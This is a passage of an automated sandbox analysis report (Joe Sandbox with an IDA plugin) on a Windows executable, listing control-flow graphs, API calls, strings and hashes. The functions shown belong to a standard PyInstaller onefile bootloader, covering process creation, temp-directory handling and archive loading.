19318->19319 19320 7ff644891fe4 GetOEMCP 19319->19320 19321 7ff644891ff6 19319->19321 19323 7ff64489200b 19320->19323 19322 7ff644891ffb GetACP 19321->19322 19321->19323 19322->19323 19323->19284 19323->19299 19325 7ff644891fc4 47 API calls 19324->19325 19328 7ff644892699 19325->19328 19326 7ff6448927ef 19330 7ff64487c550 _log10_special 8 API calls 19326->19330 19327 7ff6448926f0 __scrt_get_show_window_mode 19351 7ff6448920dc 19327->19351 19328->19326 19328->19327 19329 7ff6448926d6 IsValidCodePage 19328->19329 19329->19326 19331 7ff6448926e7 19329->19331 19332 7ff644892431 19330->19332 19331->19327 19333 7ff644892716 GetCPInfo 19331->19333 19332->19291 19332->19292 19333->19326 19333->19327 19407 7ff6448902d8 EnterCriticalSection 19335->19407 19352 7ff644892119 GetCPInfo 19351->19352 19361 7ff64489220f 19351->19361 19357 7ff64489212c 19352->19357 19352->19361 19353 7ff64487c550 _log10_special 8 API calls 19354 7ff6448922ae 19353->19354 19354->19326 19355 7ff644892e40 48 API calls 19356 7ff6448921a3 19355->19356 19362 7ff644897b84 19356->19362 19357->19355 19360 7ff644897b84 54 API calls 19360->19361 19361->19353 19363 7ff644884f4c 45 API calls 19362->19363 19364 7ff644897ba9 19363->19364 19367 7ff644897850 19364->19367 19368 7ff644897891 19367->19368 19369 7ff64488f8a0 _fread_nolock MultiByteToWideChar 19368->19369 19372 7ff6448978db 19369->19372 19370 7ff644897b59 19371 7ff64487c550 _log10_special 8 API calls 19370->19371 19373 7ff6448921d6 19371->19373 19372->19370 19374 7ff64488d5fc _fread_nolock 12 API calls 19372->19374 19376 7ff644897913 19372->19376 19397 7ff644897a11 19372->19397 19373->19360 19374->19376 19375 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19375->19370 19377 7ff64488f8a0 _fread_nolock MultiByteToWideChar 19376->19377 19376->19397 19378 7ff644897986 19377->19378 19378->19397 19398 7ff64488f0e4 19378->19398 19381 7ff6448979d1 19384 7ff64488f0e4 __crtLCMapStringW 6 API calls 19381->19384 19381->19397 19382 7ff644897a22 19383 7ff64488d5fc _fread_nolock 12 API calls 19382->19383 19385 7ff644897a40 19382->19385 19395 7ff644897af4 19382->19395 19383->19385 19384->19397 19387 7ff64488f0e4 __crtLCMapStringW 6 API calls 19385->19387 19385->19397 19386 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19386->19397 19388 7ff644897ac0 19387->19388 19389 7ff644897ae0 19388->19389 19390 7ff644897af6 19388->19390 19388->19395 19392 7ff6448907e8 WideCharToMultiByte 19389->19392 19391 7ff6448907e8 WideCharToMultiByte 19390->19391 19393 7ff644897aee 19391->19393 19392->19393 19394 7ff644897b0e 19393->19394 19393->19395 19396 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19394->19396 19394->19397 19395->19386 19395->19397 19396->19397 19397->19370 19397->19375 19399 7ff64488ed10 __crtLCMapStringW 5 API calls 19398->19399 19400 7ff64488f122 19399->19400 19401 7ff64488f12a 19400->19401 19404 7ff64488f1d0 19400->19404 19401->19381 19401->19382 19401->19397 19403 7ff64488f193 LCMapStringW 19403->19401 19405 7ff64488ed10 __crtLCMapStringW 5 API calls 19404->19405 19406 7ff64488f1fe __crtLCMapStringW 19405->19406 19406->19403 20312 7ff64488c520 20323 7ff6448902d8 EnterCriticalSection 20312->20323

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 7ff6448789e0-7ff644878b26 call 7ff64487c850 call 7ff644879390 SetConsoleCtrlHandler GetStartupInfoW call 7ff6448853f0 call 7ff64488a47c call 7ff64488871c call 7ff6448853f0 call 7ff64488a47c call 7ff64488871c call 7ff6448853f0 call 7ff64488a47c call 7ff64488871c GetCommandLineW CreateProcessW 23 7ff644878b4d-7ff644878b89 RegisterClassW 0->23 24 7ff644878b28-7ff644878b48 GetLastError call 7ff644872c50 0->24 26 7ff644878b8b GetLastError 23->26 27 7ff644878b91-7ff644878be5 CreateWindowExW 23->27 31 7ff644878e39-7ff644878e5f call 7ff64487c550 24->31 26->27 29 7ff644878be7-7ff644878bed GetLastError 27->29 30 7ff644878bef-7ff644878bf4 ShowWindow 27->30 32 7ff644878bfa-7ff644878c0a WaitForSingleObject 29->32 30->32 34 7ff644878c0c 32->34 35 7ff644878c88-7ff644878c8f 32->35 39 7ff644878c10-7ff644878c13 34->39 36 7ff644878cd2-7ff644878cd9 35->36 37 7ff644878c91-7ff644878ca1 WaitForSingleObject 35->37 42 7ff644878dc0-7ff644878dd9 GetMessageW 36->42 43 7ff644878cdf-7ff644878cf5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff644878df8-7ff644878e02 37->40 41 7ff644878ca7-7ff644878cb7 TerminateProcess 37->41 44 7ff644878c1b-7ff644878c22 39->44 45 7ff644878c15 GetLastError 39->45 49 7ff644878e04-7ff644878e0a DestroyWindow 40->49 50 7ff644878e11-7ff644878e35 GetExitCodeProcess CloseHandle * 2 40->50 51 7ff644878cb9 GetLastError 41->51 52 7ff644878cbf-7ff644878ccd WaitForSingleObject 41->52 47 7ff644878ddb-7ff644878de9 TranslateMessage DispatchMessageW 42->47 48 7ff644878def-7ff644878df6 42->48 53 7ff644878d00-7ff644878d38 MsgWaitForMultipleObjects PeekMessageW 43->53 44->37 46 7ff644878c24-7ff644878c41 PeekMessageW 44->46 45->44 54 7ff644878c76-7ff644878c86 WaitForSingleObject 46->54 55 7ff644878c43-7ff644878c74 TranslateMessage DispatchMessageW PeekMessageW 46->55 47->48 48->40 48->42 49->50 50->31 51->52 52->40 56 7ff644878d3a 53->56 57 7ff644878d73-7ff644878d7a 53->57 54->35 54->39 55->54 55->55 58 7ff644878d40-7ff644878d71 TranslateMessage DispatchMessageW PeekMessageW 56->58 57->42 59 7ff644878d7c-7ff644878da5 QueryPerformanceCounter 57->59 58->57 58->58 59->53 60 7ff644878dab-7ff644878db2 59->60 60->40 61 7ff644878db4-7ff644878db8 60->61 61->42
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction ID: 60f8c9ef815a28acad91f9932d2e75c1c543784b6deed392831a18129e2f2de9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60D12F31A0CE868AEB10BF74E8962A937A4FF84B58F404235DE5D93AACDF3DD5558700

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 62 7ff644871000-7ff644873806 call 7ff64487fe18 call 7ff64487fe20 call 7ff64487c850 call 7ff6448853f0 call 7ff644885484 call 7ff6448736b0 76 7ff644873808-7ff64487380f 62->76 77 7ff644873814-7ff644873836 call 7ff644871950 62->77 78 7ff644873c97-7ff644873cb2 call 7ff64487c550 76->78 83 7ff64487383c-7ff644873856 call 7ff644871c80 77->83 84 7ff64487391b-7ff644873931 call 7ff6448745c0 77->84 87 7ff64487385b-7ff64487389b call 7ff644878830 83->87 90 7ff64487396a-7ff64487397f call 7ff644872710 84->90 91 7ff644873933-7ff644873960 call 7ff644877f90 84->91 96 7ff64487389d-7ff6448738a3 87->96 97 7ff6448738c1-7ff6448738cc call 7ff644884f30 87->97 99 7ff644873c8f 90->99 103 7ff644873984-7ff6448739a6 call 7ff644871c80 91->103 104 7ff644873962-7ff644873965 call 7ff64488004c 91->104 100 7ff6448738a5-7ff6448738ad 96->100 101 7ff6448738af-7ff6448738bd call 7ff6448789a0 96->101 111 7ff6448739fc-7ff644873a2a call 7ff644878940 call 7ff6448789a0 * 3 97->111 112 7ff6448738d2-7ff6448738e1 call 7ff644878830 97->112 99->78 100->101 101->97 113 7ff6448739b0-7ff6448739b9 103->113 104->90 138 7ff644873a2f-7ff644873a3e call 7ff644878830 111->138 121 7ff6448738e7-7ff6448738ed 112->121 122 7ff6448739f4-7ff6448739f7 call 7ff644884f30 112->122 113->113 116 7ff6448739bb-7ff6448739d8 call 7ff644871950 113->116 116->87 130 7ff6448739de-7ff6448739ef call 7ff644872710 116->130 123 7ff6448738f0-7ff6448738fc 121->123 122->111 127 7ff644873905-7ff644873908 123->127 128 7ff6448738fe-7ff644873903 123->128 127->122 131 7ff64487390e-7ff644873916 call 7ff644884f30 127->131 128->123 128->127 130->99 131->138 141 7ff644873a44-7ff644873a47 138->141 142 7ff644873b45-7ff644873b53 138->142 141->142 145 7ff644873a4d-7ff644873a50 141->145 143 7ff644873b59-7ff644873b5d 142->143 144 7ff644873a67 142->144 146 7ff644873a6b-7ff644873a90 call 7ff644884f30 143->146 144->146 147 7ff644873a56-7ff644873a5a 145->147 148 7ff644873b14-7ff644873b17 145->148 157 7ff644873aab-7ff644873ac0 146->157 158 7ff644873a92-7ff644873aa6 call 7ff644878940 146->158 147->148 149 7ff644873a60 147->149 150 7ff644873b19-7ff644873b1d 148->150 151 7ff644873b2f-7ff644873b40 call 7ff644872710 148->151 149->144 150->151 153 7ff644873b1f-7ff644873b2a 150->153 159 7ff644873c7f-7ff644873c87 151->159 153->146 161 7ff644873be8-7ff644873bfa call 7ff644878830 157->161 162 7ff644873ac6-7ff644873aca 157->162 158->157 159->99 170 7ff644873bfc-7ff644873c02 161->170 171 7ff644873c2e 161->171 164 7ff644873bcd-7ff644873be2 call 7ff644871940 162->164 165 7ff644873ad0-7ff644873ae8 call 7ff644885250 162->165 164->161 164->162 175 7ff644873aea-7ff644873b02 call 7ff644885250 165->175 176 7ff644873b62-7ff644873b7a call 7ff644885250 165->176 173 7ff644873c04-7ff644873c1c 170->173 174 7ff644873c1e-7ff644873c2c 170->174 177 7ff644873c31-7ff644873c40 call 7ff644884f30 171->177 173->177 174->177 175->164 186 7ff644873b08-7ff644873b0f 175->186 184 7ff644873b7c-7ff644873b80 176->184 185 7ff644873b87-7ff644873b9f call 7ff644885250 176->185 187 7ff644873c46-7ff644873c4a 177->187 188 7ff644873d41-7ff644873d63 call 7ff6448744e0 177->188 184->185 200 7ff644873bac-7ff644873bc4 call 7ff644885250 185->200 201 7ff644873ba1-7ff644873ba5 185->201 186->164 190 7ff644873cd4-7ff644873ce6 call 7ff644878830 187->190 191 7ff644873c50-7ff644873c5f call 7ff6448790e0 187->191 198 7ff644873d65-7ff644873d6f call 7ff644874630 188->198 199 7ff644873d71-7ff644873d82 call 7ff644871c80 188->199 205 7ff644873ce8-7ff644873ceb 190->205 206 7ff644873d35-7ff644873d3c 190->206 203 7ff644873cb3-7ff644873cb6 call 7ff644878660 191->203 204 7ff644873c61 191->204 213 7ff644873d87-7ff644873d96 198->213 199->213 200->164 221 7ff644873bc6 200->221 201->200 220 7ff644873cbb-7ff644873cbd 203->220 210 7ff644873c68 call 7ff644872710 204->210 205->206 211 7ff644873ced-7ff644873d10 call 7ff644871c80 205->211 206->210 222 7ff644873c6d-7ff644873c77 210->222 228 7ff644873d2b-7ff644873d33 call 7ff644884f30 211->228 229 7ff644873d12-7ff644873d26 call 7ff644872710 call 7ff644884f30 211->229 218 7ff644873dbc-7ff644873dd2 call 7ff644879390 213->218 219 7ff644873d98-7ff644873d9f 213->219 234 7ff644873dd4 218->234 235 7ff644873de0-7ff644873dfc SetDllDirectoryW 218->235 219->218 224 7ff644873da1-7ff644873da5 219->224 226 7ff644873cc8-7ff644873ccf 220->226 227 7ff644873cbf-7ff644873cc6 220->227 221->164 222->159 224->218 230 7ff644873da7-7ff644873db6 LoadLibraryExW 224->230 226->213 227->210 228->213 229->222 230->218 234->235 236 7ff644873ef9-7ff644873f00 235->236 237 7ff644873e02-7ff644873e11 call 7ff644878830 235->237 242 7ff644873f06-7ff644873f0d 236->242 243 7ff644874000-7ff644874008 236->243 250 7ff644873e2a-7ff644873e34 call 7ff644884f30 237->250 251 7ff644873e13-7ff644873e19 237->251 242->243 246 7ff644873f13-7ff644873f1d call 7ff6448733c0 242->246 247 7ff64487402d-7ff64487405f call 7ff6448736a0 call 7ff644873360 call 7ff644873670 call 7ff644876fc0 call 7ff644876d70 243->247 248 7ff64487400a-7ff644874027 PostMessageW GetMessageW 243->248 246->222 260 7ff644873f23-7ff644873f37 call 7ff6448790c0 246->260 248->247 263 7ff644873eea-7ff644873ef4 call 7ff644878940 250->263 264 7ff644873e3a-7ff644873e40 250->264 254 7ff644873e1b-7ff644873e23 251->254 255 7ff644873e25-7ff644873e27 251->255 254->255 255->250 269 7ff644873f5c-7ff644873f98 call 7ff644878940 call 7ff6448789e0 call 7ff644876fc0 call 7ff644876d70 call 7ff6448788e0 260->269 270 7ff644873f39-7ff644873f56 PostMessageW GetMessageW 260->270 263->236 264->263 268 7ff644873e46-7ff644873e4c 264->268 272 7ff644873e57-7ff644873e59 268->272 273 7ff644873e4e-7ff644873e50 268->273 308 7ff644873f9d-7ff644873f9f 269->308 270->269 272->236 277 7ff644873e5f-7ff644873e7b call 7ff644876dc0 call 7ff644877340 272->277 276 7ff644873e52 273->276 273->277 276->236 289 7ff644873e7d-7ff644873e84 277->289 290 7ff644873e86-7ff644873e8d 277->290 292 7ff644873ed3-7ff644873ee8 call 7ff644872a50 call 7ff644876fc0 call 7ff644876d70 289->292 293 7ff644873ea7-7ff644873eb1 call 7ff6448771b0 290->293 294 7ff644873e8f-7ff644873e9c call 7ff644876e00 290->294 292->236 306 7ff644873ebc-7ff644873eca call 7ff6448774f0 293->306 307 7ff644873eb3-7ff644873eba 293->307 294->293 305 7ff644873e9e-7ff644873ea5 294->305 305->292 306->236 317 7ff644873ecc 306->317 307->292 311 7ff644873fed-7ff644873ffb call 7ff644871900 308->311 312 7ff644873fa1-7ff644873fb7 call 7ff644878ed0 call 7ff6448788e0 308->312 311->222 312->311 323 7ff644873fb9-7ff644873fce 312->323 317->292 324 7ff644873fe8 call 7ff644872a50 323->324 325 7ff644873fd0-7ff644873fe3 call 7ff644872710 call 7ff644871900 323->325 324->311 325->222
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                • Opcode ID: 674bcc60670d672aff4ed365146476eca55c393db1b0a501f98576d5e66456e0
                                                                                                                                                                                                                                • Instruction ID: 0b21d57aca241b12cceed5b878a980193b2330edbd7d19641619f60746a22517
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 674bcc60670d672aff4ed365146476eca55c393db1b0a501f98576d5e66456e0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE328D22F0CA8299FA15FB2098E73B96651AF95780F844032DE5DC36DEEF2DE554C302

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 538 7ff644896964-7ff6448969d7 call 7ff644896698 541 7ff6448969f1-7ff6448969fb call 7ff644888520 538->541 542 7ff6448969d9-7ff6448969e2 call 7ff644884ee8 538->542 548 7ff644896a16-7ff644896a7f CreateFileW 541->548 549 7ff6448969fd-7ff644896a14 call 7ff644884ee8 call 7ff644884f08 541->549 547 7ff6448969e5-7ff6448969ec call 7ff644884f08 542->547 562 7ff644896d32-7ff644896d52 547->562 552 7ff644896a81-7ff644896a87 548->552 553 7ff644896afc-7ff644896b07 GetFileType 548->553 549->547 558 7ff644896ac9-7ff644896af7 GetLastError call 7ff644884e7c 552->558 559 7ff644896a89-7ff644896a8d 552->559 555 7ff644896b09-7ff644896b44 GetLastError call 7ff644884e7c CloseHandle 553->555 556 7ff644896b5a-7ff644896b61 553->556 555->547 573 7ff644896b4a-7ff644896b55 call 7ff644884f08 555->573 565 7ff644896b63-7ff644896b67 556->565 566 7ff644896b69-7ff644896b6c 556->566 558->547 559->558 560 7ff644896a8f-7ff644896ac7 CreateFileW 559->560 560->553 560->558 570 7ff644896b72-7ff644896bc7 call 7ff644888438 565->570 566->570 571 7ff644896b6e 566->571 576 7ff644896be6-7ff644896c17 call 7ff644896418 570->576 577 7ff644896bc9-7ff644896bd5 call 7ff6448968a0 570->577 571->570 573->547 584 7ff644896c19-7ff644896c1b 576->584 585 7ff644896c1d-7ff644896c5f 576->585 577->576 583 7ff644896bd7 577->583 586 7ff644896bd9-7ff644896be1 call 7ff64488aac0 583->586 584->586 587 7ff644896c81-7ff644896c8c 585->587 588 7ff644896c61-7ff644896c65 585->588 586->562 589 7ff644896d30 587->589 590 7ff644896c92-7ff644896c96 587->590 588->587 592 7ff644896c67-7ff644896c7c 588->592 589->562 590->589 593 7ff644896c9c-7ff644896ce1 CloseHandle CreateFileW 590->593 592->587 595 7ff644896ce3-7ff644896d11 GetLastError call 7ff644884e7c call 7ff644888660 593->595 596 7ff644896d16-7ff644896d2b 593->596 595->596 596->589
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction ID: dd2a26a26d53b17f2a3778c7fc028f4f761f290a0883d563173c3e4702731931
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86C1B137B28E4689EB10EF65C4926AC3761F789BA8F015239DE1EA7798DF39D451C300

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF64487842B
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784AE
                                                                                                                                                                                                                                • DeleteFileW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784CD
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784DB
                                                                                                                                                                                                                                • FindClose.KERNEL32(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784EC
                                                                                                                                                                                                                                • RemoveDirectoryW.KERNELBASE(?,00007FF644878919,00007FF644873F9D), ref: 00007FF6448784F5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction ID: bdff96ecf19b1bb6f1aff61b75035635b47a24be6078d4aa366f52dcaa5329e0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64411021B0CD46D9EA20BB64E8E61BA63A0FB94754F900232EE9DC36DCEF7DD5458740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction ID: 3130ba89440e5f17199f01b0e4791b374f000c21622634472f1aacc44fbfb46c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F04422B1C6418AF760BB64B8DA7667350BB84764F040235DE7D42AD8DF3CD0498A04

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 331 7ff644871950-7ff64487198b call 7ff6448745c0 334 7ff644871991-7ff6448719d1 call 7ff644877f90 331->334 335 7ff644871c4e-7ff644871c72 call 7ff64487c550 331->335 340 7ff644871c3b-7ff644871c3e call 7ff64488004c 334->340 341 7ff6448719d7-7ff6448719e7 call 7ff6448806d4 334->341 345 7ff644871c43-7ff644871c4b 340->345 346 7ff644871a08-7ff644871a24 call 7ff64488039c 341->346 347 7ff6448719e9-7ff644871a03 call 7ff644884f08 call 7ff644872910 341->347 345->335 353 7ff644871a26-7ff644871a40 call 7ff644884f08 call 7ff644872910 346->353 354 7ff644871a45-7ff644871a5a call 7ff644884f28 346->354 347->340 353->340 360 7ff644871a5c-7ff644871a76 call 7ff644884f08 call 7ff644872910 354->360 361 7ff644871a7b-7ff644871afc call 7ff644871c80 * 2 call 7ff6448806d4 354->361 360->340 373 7ff644871b01-7ff644871b14 call 7ff644884f44 361->373 376 7ff644871b16-7ff644871b30 call 7ff644884f08 call 7ff644872910 373->376 377 7ff644871b35-7ff644871b4e call 7ff64488039c 373->377 376->340 383 7ff644871b50-7ff644871b6a call 7ff644884f08 call 7ff644872910 377->383 384 7ff644871b6f-7ff644871b8b call 7ff644880110 377->384 383->340 390 7ff644871b8d-7ff644871b99 call 7ff644872710 384->390 391 7ff644871b9e-7ff644871bac 384->391 390->340 391->340 394 7ff644871bb2-7ff644871bb9 391->394 397 7ff644871bc1-7ff644871bc7 394->397 398 7ff644871bc9-7ff644871bd6 397->398 399 7ff644871be0-7ff644871bef 397->399 400 7ff644871bf1-7ff644871bfa 398->400 399->399 399->400 401 7ff644871bfc-7ff644871bff 400->401 402 7ff644871c0f 400->402 401->402 403 7ff644871c01-7ff644871c04 401->403 404 7ff644871c11-7ff644871c24 402->404 403->402 405 7ff644871c06-7ff644871c09 403->405 406 7ff644871c2d-7ff644871c39 404->406 407 7ff644871c26 404->407 405->402 408 7ff644871c0b-7ff644871c0d 405->408 406->340 406->397 407->406 408->404
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644877F90: _fread_nolock.LIBCMT ref: 00007FF64487803A
                                                                                                                                                                                                                                • _fread_nolock.LIBCMT ref: 00007FF644871A1B
